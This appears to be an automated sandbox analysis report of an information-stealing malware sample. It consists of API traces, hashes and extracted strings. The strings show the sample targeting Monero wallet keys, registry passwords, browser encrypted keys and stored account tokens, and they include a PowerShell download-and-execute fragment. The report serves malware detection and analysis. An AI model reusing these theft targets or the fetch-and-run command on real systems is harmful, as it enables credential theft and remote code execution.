                            • Opcode ID: d06fd0f234cbf332e502fefcead6ac27791d9d2765f33ba15e3ce233fe14a157
                            • Instruction ID: 06836b89473d19304ca41b0cd0c9102d4ad93e8a3fb7221891980223c535d4c9
                            • Opcode Fuzzy Hash: d06fd0f234cbf332e502fefcead6ac27791d9d2765f33ba15e3ce233fe14a157
                            • Instruction Fuzzy Hash: 89510C709105489BDB16FF60C996EED7B79AF10302F504118EC066E5A2EF346B4DEB62
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 21d1b0276d02e28b6fc928cff9ee26574f265ca97cc77ae55edc8a3005d20798
                            • Instruction ID: ad10f30ed8ce4fbb0654131825815dc0f1cbc547c870dd352fe43c733e495079
                            • Opcode Fuzzy Hash: 21d1b0276d02e28b6fc928cff9ee26574f265ca97cc77ae55edc8a3005d20798
                            • Instruction Fuzzy Hash: 96C1C7B590020C9BCB15EF60DC89FEA7778BF64305F004599F90A6B161EB70AA89DF91
                            APIs
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 003542EC
                            • lstrcat.KERNEL32(?,00FBE1A8), ref: 0035430B
                            • lstrcat.KERNEL32(?,?), ref: 0035431F
                            • lstrcat.KERNEL32(?,00FBD108), ref: 00354333
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 00358D90: GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F
                              • Part of subcall function 00349CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00349D39
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                              • Part of subcall function 003593C0: GlobalAlloc.KERNEL32(00000000,003543DD,003543DD), ref: 003593D3
                            • StrStrA.SHLWAPI(?,00FBE2B0), ref: 003543F3
                            • GlobalFree.KERNEL32(?), ref: 00354512
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349AEF
                              • Part of subcall function 00349AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00344EEE,00000000,?), ref: 00349B01
                              • Part of subcall function 00349AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N4,00000000,00000000), ref: 00349B2A
                              • Part of subcall function 00349AC0: LocalFree.KERNEL32(?,?,?,?,00344EEE,00000000,?), ref: 00349B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 003544A3
                            • StrCmpCA.SHLWAPI(?,003608D1), ref: 003544C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003544D2
                            • lstrcat.KERNEL32(00000000,?), ref: 003544E5
                            • lstrcat.KERNEL32(00000000,00360FB8), ref: 003544F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: 7a52b7fb43e871bc41be9980eb7fb8fe5d089888b40b4b9719329b40e1c8f5c0
                            • Instruction ID: d144d6103a5fa8171b48aea0ad00a8ce9665d1d444f4e6b4420ae8ca428b11d9
                            • Opcode Fuzzy Hash: 7a52b7fb43e871bc41be9980eb7fb8fe5d089888b40b4b9719329b40e1c8f5c0
                            • Instruction Fuzzy Hash: F9716B76900208ABDB15EBA0DC85FEE73B9AB58301F004599FA05A7191EB34DB4DDF61
                            APIs
                              • Part of subcall function 003412A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003412B4
                              • Part of subcall function 003412A0: RtlAllocateHeap.NTDLL(00000000), ref: 003412BB
                              • Part of subcall function 003412A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003412D7
                              • Part of subcall function 003412A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003412F5
                              • Part of subcall function 003412A0: RegCloseKey.ADVAPI32(?), ref: 003412FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0034134F
                            • lstrlen.KERNEL32(?), ref: 0034135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00341377
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 00358B60: GetSystemTime.KERNEL32(00360E1A,00FAF740,003605AE,?,?,003413F9,?,0000001A,00360E1A,00000000,?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 00358B86
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00341465
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                              • Part of subcall function 003499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                              • Part of subcall function 003499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                              • Part of subcall function 003499C0: ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                              • Part of subcall function 003499C0: LocalFree.KERNEL32(0034148F), ref: 00349A90
                              • Part of subcall function 003499C0: CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 003414EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 7ccb2016b0e0b644e58c96129ab05acd852d0721131bbecc0bd94a3a555ad56d
                            • Instruction ID: b3a8e8a9d00c161f48e6c7fd7511f3e95d0a26fa708bc9f64dd57d4bc27d5720
                            • Opcode Fuzzy Hash: 7ccb2016b0e0b644e58c96129ab05acd852d0721131bbecc0bd94a3a555ad56d
                            • Instruction Fuzzy Hash: 455153B1D5051857CB16EB60DC92FED777CAF54301F404298BA0AAA091EF306B8DDFA6
                            APIs
                              • Part of subcall function 003472D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0034733A
                              • Part of subcall function 003472D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
                              • Part of subcall function 003472D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
                              • Part of subcall function 003472D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
                              • Part of subcall function 003472D0: HeapFree.KERNEL32(00000000), ref: 00347459
                            • lstrcat.KERNEL32(00000000,003617FC), ref: 00347606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00347648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0034765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0034768F
                            • lstrcat.KERNEL32(00000000,00361804), ref: 003476A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 003476D3
                            • lstrcat.KERNEL32(00000000,00361808), ref: 003476ED
                            • task.LIBCPMTD ref: 003476FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                            • String ID: :
                            • API String ID: 2677904052-3653984579
                            • Opcode ID: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
                            • Instruction ID: 0fc42ac95f7768f061496f6957e38b26fc4b05c3fd6cec1fc74ed75e3bd5d0ba
                            • Opcode Fuzzy Hash: 8c754faf2ad67d9700c0d82f8a382673a3486beb66313b20ea6833a788e22bb1
                            • Instruction Fuzzy Hash: 56316B71D00109DBDB06EBA4DC85DEE73B9FB64301B14410AF502BB295EB38A94ADB61
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00FBDE18,00000000,?,00360E2C,00000000,?,00000000), ref: 00358130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00358137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00358158
                            • __aulldiv.LIBCMT ref: 00358172
                            • __aulldiv.LIBCMT ref: 00358180
                            • wsprintfA.USER32 ref: 003581AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            APIs
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                              • Part of subcall function 003447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00344839
                              • Part of subcall function 003447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00344849
                            • InternetOpenA.WININET(00360DF7,00000001,00000000,00000000,00000000), ref: 0034610F
                            • StrCmpCA.SHLWAPI(?,00FBE858), ref: 00346147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0034618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003461B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 003461DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0034620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00346249
                            • InternetCloseHandle.WININET(?), ref: 00346253
                            • InternetCloseHandle.WININET(00000000), ref: 00346260
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            APIs
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0034733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003473B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0034740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00347452
                            • HeapFree.KERNEL32(00000000), ref: 00347459
                            • task.LIBCPMTD ref: 00347555
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuetask
                            • String ID: Password
                            • API String ID: 775622407-3434357891
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0034BC9F
                              • Part of subcall function 00358E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00358E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0034BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0034BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0034BDB9
                            Strings
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            APIs
                            Strings
                            Yara matches
                            Similarity
                            • API ID: ExitProcess$DefaultLangUser
                            • String ID: *
                            • API String ID: 1494266314-163128923
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00344FCA
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00344FD1
                            • InternetOpenA.WININET(00360DDF,00000000,00000000,00000000,00000000), ref: 00344FEA
                            • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00345011
                            • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00345041
                            • InternetCloseHandle.WININET(?), ref: 003450B9
                            • InternetCloseHandle.WININET(?), ref: 003450C6
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                            • String ID:
                            • API String ID: 3066467675-0
                            APIs
                            • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00358426
                            • wsprintfA.USER32 ref: 00358459
                            • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0035847B
                            • RegCloseKey.ADVAPI32(00000000), ref: 0035848C
                            • RegCloseKey.ADVAPI32(00000000), ref: 00358499
                              • Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6
                            • RegQueryValueExA.ADVAPI32(00000000,00FBDFE0,00000000,000F003F,?,00000400), ref: 003584EC
                            • lstrlen.KERNEL32(?), ref: 00358501
                            • RegQueryValueExA.ADVAPI32(00000000,00FBE070,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00360B34), ref: 00358599
                            • RegCloseKey.ADVAPI32(00000000), ref: 00358608
                            • RegCloseKey.ADVAPI32(00000000), ref: 0035861A
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                            • String ID: %s\%s
                            • API String ID: 3896182533-4073750446
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003576A4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 003576AB
                            • RegOpenKeyExA.ADVAPI32(80000002,00FAC5E8,00000000,00020119,00000000), ref: 003576DD
                            • RegQueryValueExA.ADVAPI32(00000000,00FBE028,00000000,00000000,?,000000FF), ref: 003576FE
                            • RegCloseKey.ADVAPI32(00000000), ref: 00357708
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: Windows 11
                            • API String ID: 3225020163-2517555085
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357734
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0035773B
                            • RegOpenKeyExA.ADVAPI32(80000002,00FAC5E8,00000000,00020119,003576B9), ref: 0035775B
                            • RegQueryValueExA.ADVAPI32(003576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0035777A
                            • RegCloseKey.ADVAPI32(003576B9), ref: 00357784
                            Strings
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID: CurrentBuildNumber
                            • API String ID: 3225020163-1022791448
                            • Opcode ID: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
                            • Instruction ID: 646d133466b63d659c529316b03f6276edb238f33e1f64e9b1c784a0c6c1cccc
                            • Opcode Fuzzy Hash: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
                            • Instruction Fuzzy Hash: 6E01FFB5A40308BBFB00DBE4DC4AFAEB7B8EB58701F104559FE05B7291DA745A049F61
                            APIs
                            • CreateFileA.KERNEL32(:5,80000000,00000003,00000000,00000003,00000080,00000000,?,00353AEE,?), ref: 003592FC
                            • GetFileSizeEx.KERNEL32(000000FF,:5), ref: 00359319
                            • CloseHandle.KERNEL32(000000FF), ref: 00359327
                            Strings
                            Yara matches
                            Similarity
                            • API ID: File$CloseCreateHandleSize
                            • String ID: :5$:5
                            • API String ID: 1378416451-989784648
                            • Opcode ID: a14b1eae711fc9596eea1b310c534e8c94085783a0d89232bdd5d6586a38e479
                            • Instruction ID: 7fb11afad48c1e78ad66bd5cc91ec50d5011fd5ea7ea1ab3ff5b630a82d2f361
                            • Opcode Fuzzy Hash: a14b1eae711fc9596eea1b310c534e8c94085783a0d89232bdd5d6586a38e479
                            • Instruction Fuzzy Hash: 07F08C38E00208FBEB10DBB0DC08F9E77B9EB58311F108255BA51A72D0E6709604AB40
                            APIs
                            • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
                            • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
                            • ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
                            • LocalFree.KERNEL32(0034148F), ref: 00349A90
                            • CloseHandle.KERNEL32(000000FF), ref: 00349A9A
                            Yara matches
                            Similarity
                            • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                            • String ID:
                            • API String ID: 2311089104-0
                            • Opcode ID: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
                            • Instruction ID: 3e49d0057a4146cdc5570851fe0a286c16b39f9ba38fce7fba9f1a6df771523a
                            • Opcode Fuzzy Hash: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
                            • Instruction Fuzzy Hash: 87314BB4A00209EFDB15CF94C885FAE77F9FF48300F108159E901AB290D778AA45DFA1
                            APIs
                            • lstrcat.KERNEL32(?,00FBE1A8), ref: 003547DB
                              • Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00354801
                            • lstrcat.KERNEL32(?,?), ref: 00354820
                            • lstrcat.KERNEL32(?,?), ref: 00354834
                            • lstrcat.KERNEL32(?,00FABB88), ref: 00354847
                            • lstrcat.KERNEL32(?,?), ref: 0035485B
                            • lstrcat.KERNEL32(?,00FBDC80), ref: 0035486F
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 00358D90: GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F
                              • Part of subcall function 00354570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00354580
                              • Part of subcall function 00354570: RtlAllocateHeap.NTDLL(00000000), ref: 00354587
                              • Part of subcall function 00354570: wsprintfA.USER32 ref: 003545A6
                              • Part of subcall function 00354570: FindFirstFileA.KERNEL32(?,?), ref: 003545BD
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                            • String ID:
                            • API String ID: 2540262943-0
                            • Opcode ID: dfab7dab88762295ba5940909ecb7aeef30f3a3d70ed09576b52c25390e0f14c
                            • Instruction ID: 6d52ff76d37b53a67a2940aebf1bf5ec090f40a33e5bdfc5afd630c6b745e609
                            • Opcode Fuzzy Hash: dfab7dab88762295ba5940909ecb7aeef30f3a3d70ed09576b52c25390e0f14c
                            • Instruction Fuzzy Hash: C93184B290020857DB16FBB0DC85EED737CAB58701F404589BB15BA091EE74978DCFA1
                            APIs
                              • Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788
                              • Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,00FB9848,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
                              • Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
                              • Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12
                              • Part of subcall function 0035A920: lstrcpy.KERNEL32(00000000,?), ref: 0035A972
                              • Part of subcall function 0035A920: lstrcat.KERNEL32(00000000), ref: 0035A982
                              • Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00352D85
                            Strings
                            • ')", xrefs: 00352CB3
                            • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00352CC4
                            • <, xrefs: 00352D39
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00352D04
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                            • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            • API String ID: 3031569214-898575020
